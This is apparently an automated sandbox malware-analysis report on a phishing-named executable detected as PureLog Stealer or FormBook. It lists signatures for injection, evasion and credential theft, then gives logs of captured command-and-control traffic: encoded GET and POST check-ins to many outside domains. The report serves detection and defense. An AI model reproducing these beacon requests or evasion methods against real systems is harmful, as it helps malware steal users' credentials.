Windows Analysis Report
PO1268931024 - Bank Slip.exe

Overview

General Information

Sample name: PO1268931024 - Bank Slip.exe
Analysis ID: 1539142
MD5: 1fcde6f41117bdc978a69990608ecc69
SHA1: e8724b7ed145e838303d0b1bb393c8f3545ad567
SHA256: ee843bcf3bcd091101e9d641670be54dd9c3a2733ad3e248c29eb7e2a667c1d4
Tags: exe, Formbook, user-lowmal3
Infos:

Detection

PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Suspicious Creation with Colorcpl
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO1268931024 - Bank Slip.exe (PID: 6240 cmdline: "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe" MD5: 1FCDE6F41117BDC978A69990608ECC69)
    • PO1268931024 - Bank Slip.exe (PID: 5808 cmdline: "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe" MD5: 1FCDE6F41117BDC978A69990608ECC69)
      • eiVHpMoiongmS.exe (PID: 5796 cmdline: "C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • colorcpl.exe (PID: 2588 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
          • firefox.exe (PID: 2564 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1781279015.0000000005930000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1770346968.0000000004139000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: PO1268931024 - Bank Slip.exe PID: 6240 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

Source | Rule | Description | Author | Strings
0.2.PO1268931024 - Bank Slip.exe.414e790.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.PO1268931024 - Bank Slip.exe.5930000.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                System Summary

                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2588, TargetFilename: C:\Users\user

                AV Detection

                Source: PO1268931024 - Bank Slip.exeAvira: detected
                Source: PO1268931024 - Bank Slip.exeReversingLabs: Detection: 52%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: PO1268931024 - Bank Slip.exeJoe Sandbox ML: detected
                Source: PO1268931024 - Bank Slip.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO1268931024 - Bank Slip.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: colorcpl.pdbGCTL source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000003.2048251287.000000000084C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: colorcpl.pdb source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974188510.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000003.2048251287.000000000084C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eiVHpMoiongmS.exe, 00000004.00000002.4157212412.00000000000FE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1977997505.0000000005079000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1976076736.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO1268931024 - Bank Slip.exe, PO1268931024 - Bank Slip.exe, 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000003.1977997505.0000000005079000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.1976076736.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: PbnE.pdb source: PO1268931024 - Bank Slip.exe
                Source: Binary string: PbnE.pdbSHA2561 source: PO1268931024 - Bank Slip.exe
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0321C3B0 FindFirstFileW,FindNextFileW,FindClose,7_2_0321C3B0
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4x nop then pop edi4_2_06C062FC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exeCode function: 4x nop then xor eax, eax4_2_06C0A1BD
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then xor eax, eax7_2_03209DC0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then mov ebx, 00000004h7_2_051404E0

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 141.193.213.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 141.193.213.10:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49771 -> 141.193.213.10:80
                Source: Joe Sandbox ViewIP Address: 141.193.213.10 141.193.213.10
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: DV-PRIMARY-ASN1US DV-PRIMARY-ASN1US
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /up8i/?qp=qTZ8t28&_XPD90E=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ladylawher.orgUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /9g6s/?_XPD90E=l/X+t9hb8CWGjOR6SGZVUSer8Zv3g1fAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvXswkeLIgZt7sZdEg/e0UbdbzANigZVdYlcc=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.meanttobebroken.orgUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /li8d/?qp=qTZ8t28&_XPD90E=sm+xvlFNJ8Jn1MAgd7H5GM7xL3QFLG7nhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbr4aM8dbnuEYYtVmB+eJtacLqhBkyb5k3hgGU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.jexiz.shopUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /3lre/?_XPD90E=/6Vdp+1Y21llHWroV1g1nbD9sUc5jc+T517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnGnVkV2kzsYh+hkLabXiWN1IrSGybLcPbfYA=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.prediksipreman.fyiUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /855d/?_XPD90E=2B0ERzH0P28lwthdevcVhvj9llT5BlecEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoSssJTtiqjkpOnyuaVgJz/zdISSnDhIUOFk8Y=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.givora.siteUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /jx6k/?_XPD90E=beqWGJ7SP2hkLKuIgnm7ooabSifxwbgOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrAUgG0kgyTvD4QnbATbVShaQ+9re30AjSG1c=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.2925588.comUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global trafficHTTP traffic detected: GET /6o8s/?_XPD90E=xHDOnX+lWlIEr4hmVq7JKpd6pqyOkl158G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfZgdz+oXBkvcBUJwvknbqZIgwAmVeRiOE+Mw=&qp=qTZ8t28 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.wrl-llc.netUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global traffic; HTTP traffic detected: GET /l5ty/?_XPD90E=q+OYZAje5TGGPxruqv4Ie4uGL0FJBdVtlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAIZom36/OATPlTemOBBCw5W17q1Y0x2snJ2U=&qp=qTZ8t28 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    Host: www.7fh27o.vip
                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global traffic; HTTP traffic detected: GET /7n9v/?_XPD90E=5Ps3YXPo0Vj4JhRJ3u74t7/AROUJdOxXpTrzI5rt8FAfia/wVGxKw+cKGzuZcepElfg31D2wj7kRRQ+omDm5O2Jc0Yxiq9+lHbIPKMtQeuR7JUZIl/WZ4Mo=&qp=qTZ8t28 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    Host: www.rebel.tienda
                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global traffic; HTTP traffic detected: GET /izfe/?_XPD90E=ZqR1VSau/njxt8yVh1Y7o1xJ67xnVWQPWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h12nFCEf6h8WT1ssqtMI1FtouyVgynF3e/12Wg=&qp=qTZ8t28 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    Host: www.ila.beauty
                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global traffic; HTTP traffic detected: GET /lk0h/?_XPD90E=6gjDnw5yzGoGzEh46TJn2EnJvnJvbPG1/sFM8kPHd8kBOmP5HGhCeqzML2uvlXpT0wvdsm4ji4CabuXPMFeE122DOs0WcAnE5aNnG7jZJGeJUpqu0deDiTw=&qp=qTZ8t28 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    Host: www.college-help.info
                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global traffic; HTTP traffic detected: GET /17h7/?_XPD90E=+i5q+uzPXmftyZtCFmFN/bfjFcDFo1tt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBt4oYBPdG29ddF3diydwcHNPuP0zH2BXR0jrQ=&qp=qTZ8t28 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    Host: www.owinvip.net
                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global traffic; HTTP traffic detected: GET /x3by/?qp=qTZ8t28&_XPD90E=Gq0m/cYr7UOoL/rQtVX6VLGsSxhNwoS6IQg5KkZ1GbFCfXnP9OdFnXsg+153ZunkN9E3pnQymCUHBFpvF3MP7RrL9vQnx4xgqx+xE88oP7M+c4gRVOzDq74= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    Host: www.gucciqueen.shop
                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global traffic; HTTP traffic detected: GET /9dj3/?_XPD90E=6QQjkzQCSvmfpuxcfzRzduVcOs4hgqLYwG0aK+01EuJHGUkxy7t2bY94jR0VySJAExaEEUdpRnl4gZG+8lJgOBQVMPOuCPV/IAHX+tBHmnMxxL42lCYTH+M=&qp=qTZ8t28 HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    Host: www.xtelify.tech
                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                Source: global traffic; DNS traffic detected: DNS query: www.ladylawher.org
                Source: global traffic; DNS traffic detected: DNS query: www.meanttobebroken.org
                Source: global traffic; DNS traffic detected: DNS query: www.jexiz.shop
                Source: global traffic; DNS traffic detected: DNS query: www.prediksipreman.fyi
                Source: global traffic; DNS traffic detected: DNS query: www.givora.site
                Source: global traffic; DNS traffic detected: DNS query: www.2925588.com
                Source: global traffic; DNS traffic detected: DNS query: www.wrl-llc.net
                Source: global traffic; DNS traffic detected: DNS query: www.7fh27o.vip
                Source: global traffic; DNS traffic detected: DNS query: www.rebel.tienda
                Source: global traffic; DNS traffic detected: DNS query: www.ila.beauty
                Source: global traffic; DNS traffic detected: DNS query: www.college-help.info
                Source: global traffic; DNS traffic detected: DNS query: www.owinvip.net
                Source: global traffic; DNS traffic detected: DNS query: www.gucciqueen.shop
                Source: global traffic; DNS traffic detected: DNS query: www.xtelify.tech
                Source: global traffic; DNS traffic detected: DNS query: www.timizoasisey.shop
                Source: unknown; HTTP traffic detected: POST /9g6s/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Encoding: gzip, deflate
                    Accept-Language: en-US,en;q=0.5
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 204
                    Cache-Control: no-cache
                    Connection: close
                    Host: www.meanttobebroken.org
                    Origin: http://www.meanttobebroken.org
                    Referer: http://www.meanttobebroken.org/9g6s/
                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                    Data Ascii: _XPD90E=o9/euJtDoA2P38xaVXpTM2CwkYLhrXvoUOEzqeBL4N6Oh6gLekwqaFKAfYgp68Gru9dsczyXOU65pljUivgKMo4sQo9/M926ZsBq2JxgePCnIKCqcDN5kpNmjK70cHLFc2aer/HC1MJuaBRQ74Xp9UEOh7NY7N6Wb0fsuvHrjRF6W1PwdsN8PY78QCFcIss+pQ==
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Tue, 22 Oct 2024 07:04:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Vary: Accept-Encoding
                    x-powered-by: WP Engine
                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                    Cache-Control: no-cache, must-revalidate, max-age=0
                    Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 8d67a2ec2ce44761-DFW
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Tue, 22 Oct 2024 07:05:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Vary: Accept-Encoding
                    x-powered-by: WP Engine
                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                    Cache-Control: no-cache, must-revalidate, max-age=0
                    Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 8d67a2fc3899b793-DFW
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Tue, 22 Oct 2024 07:05:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Vary: Accept-Encoding
                    x-powered-by: WP Engine
                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                    Cache-Control: no-cache, must-revalidate, max-age=0
                    Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 8d67a30bfb3a47a2-DFW
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    keep-alive: timeout=5, max=100
                    content-type: text/html
                    transfer-encoding: chunked
                    content-encoding: gzip
                    vary: Accept-Encoding
                    date: Tue, 22 Oct 2024 07:05:26 GMT
                    server: LiteSpeed
                    x-turbo-charged-by: LiteSpeed
                    connection: close
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    keep-alive: timeout=5, max=100
                    content-type: text/html
                    transfer-encoding: chunked
                    content-encoding: gzip
                    vary: Accept-Encoding
                    date: Tue, 22 Oct 2024 07:05:28 GMT
                    server: LiteSpeed
                    x-turbo-charged-by: LiteSpeed
                    connection: close
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    keep-alive: timeout=5, max=100
                    content-type: text/html
                    transfer-encoding: chunked
                    content-encoding: gzip
                    vary: Accept-Encoding
                    date: Tue, 22 Oct 2024 07:05:31 GMT
                    server: LiteSpeed
                    x-turbo-charged-by: LiteSpeed
                    connection: close
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    keep-alive: timeout=5, max=100
                    content-type: text/html
                    transfer-encoding: chunked
                    date: Tue, 22 Oct 2024 07:05:33 GMT
                    server: LiteSpeed
                    x-turbo-charged-by: LiteSpeed
                    connection: close
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Tue, 22 Oct 2024 07:05:40 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Tue, 22 Oct 2024 07:05:42 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Tue, 22 Oct 2024 07:05:45 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Tue, 22 Oct 2024 07:05:48 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Tue, 22 Oct 2024 07:05:54 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Tue, 22 Oct 2024 07:05:56 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Tue, 22 Oct 2024 07:05:59 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Tue, 22 Oct 2024 07:06:02 GMT
                    Content-Type: text/html
                    Content-Length: 146
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 07:07:09 GMTServer: ApacheLast-Modified: Thu, 17 Oct 2024 16:54:13 GMTETag: "49d-624af093dd2da"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 